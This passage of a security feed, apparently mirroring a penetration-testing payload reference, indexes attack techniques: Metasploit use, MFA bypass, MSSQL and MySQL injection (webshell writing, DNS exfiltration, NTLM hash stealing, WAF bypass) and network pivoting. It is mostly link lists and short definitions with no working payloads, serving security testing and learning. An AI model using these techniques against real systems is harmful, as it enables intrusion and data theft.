&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#upload---download"&gt;Upload / Download&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#execute-from-memory"&gt;Execute from Memory&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#mimikatz"&gt;Mimikatz&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#pass-the-hash---psexec"&gt;Pass the Hash - PSExec&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#use-socks-proxy"&gt;Use SOCKS Proxy&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#scripting-metasploit"&gt;Scripting Metasploit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#multiple-transports"&gt;Multiple transports&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#best-of---exploits"&gt;Best of - Exploits&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>MFA Bypasses</title><link>https://bokkapig.pages.dev/refs/payloads/account-takeover/mfa-bypass/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/account-takeover/mfa-bypass/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Multi-Factor Authentication (MFA) is a security measure that requires users to provide two or more verification factors to gain access to a system, application, or network. It combines something the user knows (like a password), something they have (like a phone or security token), and/or something they are (biometric verification). This layered approach enhances security by making unauthorized access more difficult, even if a password is compromised.
MFA Bypasses are techniques attackers use to circumvent MFA protections. These methods can include exploiting weaknesses in MFA implementations, intercepting authentication tokens, leveraging social engineering to manipulate users or support staff, or exploiting session-based vulnerabilities.&lt;/p&gt;</description></item><item><title>MSSQL Injection</title><link>https://bokkapig.pages.dev/refs/payloads/sql-injection/mssql-injection/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/sql-injection/mssql-injection/</guid><description>&lt;blockquote&gt;
&lt;p&gt;MSSQL Injection is a type of security vulnerability that can occur when an attacker can insert or &amp;ldquo;inject&amp;rdquo; malicious SQL code into a query executed by a Microsoft SQL Server (MSSQL) database. This typically happens when user inputs are directly included in SQL queries without proper sanitization or parameterization. SQL Injection can lead to serious consequences such as unauthorized data access, data manipulation, and even gaining control over the database server.&lt;/p&gt;</description></item><item><title>MSSQL Server</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/mssql-server-cheatsheet/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/mssql-server-cheatsheet/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/"&gt;InternalAllTheThings/cheatsheets/mssql-server-cheatsheet&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#tools"&gt;Tools&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#identifiy-instaces-and-databases"&gt;Identify Instances and Databases&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#discover-local-sql-server-instances"&gt;Discover Local SQL Server Instances&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#discover-domain-sql-server-instances"&gt;Discover Domain SQL Server Instances&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#discover-remote-sql-instances"&gt;Discover Remote SQL Server Instances&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#identifiy-encrypted-databases"&gt;Identify Encrypted databases&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#version-query"&gt;Version Query&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#identify-sensitive-information"&gt;Identify Sensitive Information&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#get-tables-from-specific-databases"&gt;Get Tables from a Specific Database&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#gather-5-entries-from-each-column"&gt;Gather 5 Entries from Each Column&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#gather-5-entries-from-a-specific-table"&gt;Gather 5 Entries from a Specific Table&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#dump-common-information-from-server-to-files"&gt;Dump common information from server to files&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#linked-database"&gt;Linked Database&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#find-trusted-link"&gt;Find Trusted Link&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#execute-query-through-the-link"&gt;Execute Query Through The Link&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#crawl-links-for-instances-in-the-domain"&gt;Crawl Links for Instances in the Domain&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#crawl-links-for-a-specific-instance"&gt;Crawl Links for a Specific Instance&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#query-version-of-linked-database"&gt;Query Version of Linked Database&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#execute-procedure-on-linked-database"&gt;Execute Procedure on Linked Database&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#determine-names-of-linked-databases"&gt;Determine Names of Linked Databases&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#determine-all-the-tables-names-from-a-selected-linked-database"&gt;Determine All the Tables Names from a Selected Linked Database&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#gather-the-top-5-columns-from-a-selected-linked-table"&gt;Gather the Top 5 Columns from a Selected Linked Table&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#gather-entries-from-a-selected-linked-column"&gt;Gather Entries from a Selected Linked Column&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#command-execution-via-xp_cmdshell"&gt;Command Execution via xp_cmdshell&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#extended-stored-procedure"&gt;Extended Stored Procedure&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#add-the-extended-stored-procedure-and-list-extended-stored-procedures"&gt;Add the extended stored procedure and list extended stored procedures&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#clr-assemblies"&gt;CLR Assemblies&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#execute-commands-using-clr-assembly"&gt;Execute commands using CLR assembly&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#manually-creating-a-clr-dll-and-importing-it"&gt;Manually creating a CLR DLL and importing it&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#ole-automation"&gt;OLE Automation&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#execute-commands-using-ole-automation-procedures"&gt;Execute commands using OLE automation procedures&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#agent-jobs"&gt;Agent Jobs&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#execute-commands-through-sql-agent-job-service"&gt;Execute commands through SQL Agent Job service&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#list-all-jobs"&gt;List All Jobs&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#external-scripts"&gt;External Scripts&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#python"&gt;Python&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#r"&gt;R&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#audit-checks"&gt;Audit Checks&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#find-and-exploit-impersonation-opportunities"&gt;Find and exploit impersonation opportunities&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#find-databases-that-have-been-configured-as-trustworthy"&gt;Find databases that have been configured as trustworthy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#manual-sql-server-queries"&gt;Manual SQL Server Queries&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#query-current-user--determine-if-the-user-is-a-sysadmin"&gt;Query Current User &amp;amp; determine if the user is a sysadmin&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#current-role"&gt;Current Role&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#current-db"&gt;Current DB&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#list-all-tables"&gt;List all tables&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#list-all-databases"&gt;List all databases&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#all-logins-on-server"&gt;All Logins on Server&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#all-database-users-for-a-database"&gt;All Database Users for a Database&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#list-all-sysadmins"&gt;List All Sysadmins&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#list-all-database-role"&gt;List All Database Roles&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#effective-permissions-from-the-server"&gt;Effective Permissions from the Server&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#effective-permissions-from-the-database"&gt;Effective Permissions from the Database&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#find-sql-server-logins-which-can-be-impersonated-for-the-current-database"&gt;Find SQL Server Logins Which can be Impersonated for the Current Database&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#exploiting-impersonation"&gt;Exploiting Impersonation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#exploiting-nested-impersonation"&gt;Exploiting Nested Impersonation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#mssql-accounts-and-hashes"&gt;MSSQL Accounts and Hashes&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>MySQL Injection</title><link>https://bokkapig.pages.dev/refs/payloads/sql-injection/mysql-injection/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/sql-injection/mysql-injection/</guid><description>&lt;blockquote&gt;
&lt;p&gt;MySQL Injection is a type of security vulnerability that occurs when an attacker is able to manipulate the SQL queries made to a MySQL database by injecting malicious input. This vulnerability is often the result of improperly handling user input, allowing attackers to execute arbitrary SQL code that can compromise the database&amp;rsquo;s integrity and security.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#mysql-default-databases"&gt;MYSQL Default Databases&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-comments"&gt;MYSQL Comments&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-testing-injection"&gt;MYSQL Testing Injection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-union-based"&gt;MYSQL Union Based&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#detect-columns-number"&gt;Detect Columns Number&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#iterative-null-method"&gt;Iterative NULL Method&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#order-by-method"&gt;ORDER BY Method&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#limit-into-method"&gt;LIMIT INTO Method&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#extract-database-with-information_schema"&gt;Extract Database With Information_schema&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#extract-columns-name-without-information_schema"&gt;Extract Columns Name Without Information_Schema&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#extract-data-without-columns-name"&gt;Extract Data Without Columns Name&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-error-based"&gt;MYSQL Error Based&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#mysql-error-based---basic"&gt;MYSQL Error Based - Basic&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-error-based---updatexml-function"&gt;MYSQL Error Based - UpdateXML Function&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-error-based---extractvalue-function"&gt;MYSQL Error Based - Extractvalue Function&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-blind"&gt;MYSQL Blind&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#mysql-blind-with-substring-equivalent"&gt;MYSQL Blind With Substring Equivalent&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-blind-using-a-conditional-statement"&gt;MYSQL Blind Using A Conditional Statement&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-blind-with-make_set"&gt;MYSQL Blind With MAKE_SET&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-blind-with-like"&gt;MYSQL Blind With LIKE&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-blind-with-regexp"&gt;MySQL Blind With REGEXP&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-time-based"&gt;MYSQL Time Based&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#using-sleep-in-a-subselect"&gt;Using SLEEP in a Subselect&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#using-conditional-statements"&gt;Using Conditional Statements&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-dios---dump-in-one-shot"&gt;MYSQL DIOS - Dump in One Shot&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-current-queries"&gt;MYSQL Current Queries&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-read-content-of-a-file"&gt;MYSQL Read Content of a File&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-command-execution"&gt;MYSQL Command Execution&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#webshell---outfile-method"&gt;WEBSHELL - OUTFILE method&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#webshell---dumpfile-method"&gt;WEBSHELL - DUMPFILE method&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#command---udf-library"&gt;COMMAND - UDF Library&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-insert"&gt;MYSQL INSERT&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-truncation"&gt;MYSQL Truncation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-out-of-band"&gt;MYSQL Out of Band&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#dns-exfiltration"&gt;DNS Exfiltration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#unc-path---ntlm-hash-stealing"&gt;UNC Path - NTLM Hash Stealing&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#mysql-waf-bypass"&gt;MYSQL WAF Bypass&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#alternative-to-information-schema"&gt;Alternative to Information Schema&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#alternative-to-version"&gt;Alternative to VERSION&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#alternative-to-group_concat"&gt;Alternative to GROUP_CONCAT&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#scientific-notation"&gt;Scientific Notation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#conditional-comments"&gt;Conditional Comments&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#wide-byte-injection-gbk"&gt;Wide Byte Injection (GBK)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="mysql-default-databases" class="anchored-heading"&gt;MYSQL Default Databases&lt;a class="heading-anchor" href="#mysql-default-databases" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;Name&lt;/th&gt;
 &lt;th&gt;Description&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;mysql&lt;/td&gt;
 &lt;td&gt;Requires root privileges&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;information_schema&lt;/td&gt;
 &lt;td&gt;Available from version 5 and higher&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h2 id="mysql-comments" class="anchored-heading"&gt;MYSQL Comments&lt;a class="heading-anchor" href="#mysql-comments" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;MySQL comments are annotations in SQL code that are ignored by the MySQL server during execution.&lt;/p&gt;</description></item><item><title>Network Discovery</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/network-discovery/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/network-discovery/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/"&gt;InternalAllTheThings/cheatsheets/network-discovery&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#nmap"&gt;Nmap&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#network-scan-with-nc-and-ping"&gt;Network Scan with nc and ping&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#spyse"&gt;Spyse&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#masscan"&gt;Masscan&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#netdiscover"&gt;Netdiscover&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#responder"&gt;Responder&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#bettercap"&gt;Bettercap&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#reconnoitre"&gt;Reconnoitre&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#ssl-mitm-with-openssl"&gt;SSL MITM with OpenSSL&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Network Pivoting Techniques</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/network-pivoting-techniques/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/network-pivoting-techniques/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/"&gt;InternalAllTheThings/redteam/pivoting/network-pivoting-techniques&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#socks-compatibility-table"&gt;SOCKS Compatibility Table&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#windows-netsh-port-forwarding"&gt;Windows netsh Port Forwarding&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#ssh"&gt;SSH&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#socks-proxy"&gt;SOCKS Proxy&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#local-port-forwarding"&gt;Local Port Forwarding&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#remote-port-forwarding"&gt;Remote Port Forwarding&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#proxychains"&gt;Proxychains&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#graftcp"&gt;Graftcp&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#web-socks---regeorg"&gt;Web SOCKS - reGeorg&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#web-socks---pivotnacci"&gt;Web SOCKS - pivotnacci&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/#metasploit"&gt;Metasploit&lt;/a&gt;&lt;/li&gt;
